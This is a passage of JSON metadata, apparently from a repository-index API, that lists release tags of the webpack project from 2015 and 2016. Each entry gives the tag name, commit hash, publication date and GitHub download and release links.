26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"